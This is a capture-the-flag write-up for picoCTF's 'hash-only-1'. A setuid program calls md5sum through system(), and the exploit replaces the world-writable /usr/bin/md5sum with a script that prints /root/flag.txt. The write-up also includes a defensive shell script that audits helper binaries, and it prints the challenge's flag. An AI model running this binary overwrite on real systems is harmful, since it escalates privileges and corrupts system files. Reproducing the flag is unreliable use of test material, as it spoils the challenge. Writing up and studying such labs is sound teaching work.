hash-only-1

Description

Here is a binary that has enough privilege to read the content of the flag file but will only let you know its hash. If only it could just give you the actual content!

Initial analysis

Running strings on the binary reveals some key things about it:

  • The binary calls setuid and setgid to elevate privileges
  • The binary calls system() to invoke the hashing command
  • The hashing command is md5sum

We can then determine that md5sum resolves to /usr/bin/md5sum, which, for some reason, our user has write permission to.
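As an added check that is not part of the original writeup, the POSIX shell script below takes the helper command names a setuid binary hands to system() (here md5sum, as found with strings), resolves each on PATH and reports any that a non-root user could replace, which is exactly the weakness this challenge exploits. It assumes the helper names have already been collected and that ls follows the usual mode-string layout.

```shell
#!/bin/sh
# Added audit helper (not from the original writeup). Audits the external
# programs a setuid binary runs via system(): a helper that is writable by
# group/other, or not owned by root, can be swapped for an attacker's script.

# Exit 0 if FILE is group- or world-writable, 1 otherwise (missing file -> 1).
# Symlinks are followed (-L) so the real target is what gets inspected.
writable_by_others() {
    perms=$(ls -ldL "$1" 2>/dev/null | cut -c1-10)
    case "$perms" in
        ?????w????|????????w?) return 0 ;;   # group 'w' or other 'w' bit set
        *) return 1 ;;
    esac
}

# Exit 0 if FILE is owned by root, 1 otherwise.
owned_by_root() {
    [ "$(ls -ldL "$1" 2>/dev/null | awk '{print $3}')" = "root" ]
}

# Audit every helper name given as an argument. Prints one verdict line per
# helper and exits 0 only if all of them are safe to be invoked by a
# privileged program.
audit_helpers() {
    bad=0
    for name in "$@"; do
        path=$(command -v "$name" 2>/dev/null) || {
            echo "MISSING     $name (not found on PATH)"; bad=1; continue; }
        if writable_by_others "$path"; then
            echo "REPLACEABLE $path (writable by group/other)"; bad=1
        elif ! owned_by_root "$path"; then
            echo "REPLACEABLE $path (not owned by root)"; bad=1
        else
            echo "OK          $path"
        fi
    done
    return $bad
}

# For this challenge the setuid binary calls md5sum, so the audit would be:
#   audit_helpers md5sum
```

On the challenge box the audit reports /usr/bin/md5sum as REPLACEABLE; on a sanely configured system every entry in /usr/bin should come back OK.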

Exploit

We can then run the following to replace the md5sum binary with our own shell script:

echo "cat /root/flag.txt" > /usr/bin/md5sum

Flag

Finally, we can run flaghasher, which now executes our script instead of the real md5sum:

Computing the MD5 hash of /root/flag.txt....

picoCTF{sy5teM_b!n@riEs_4r3_5c@red_0f_yoU_54094e3e}
This post is licensed under CC BY 4.0 by the author.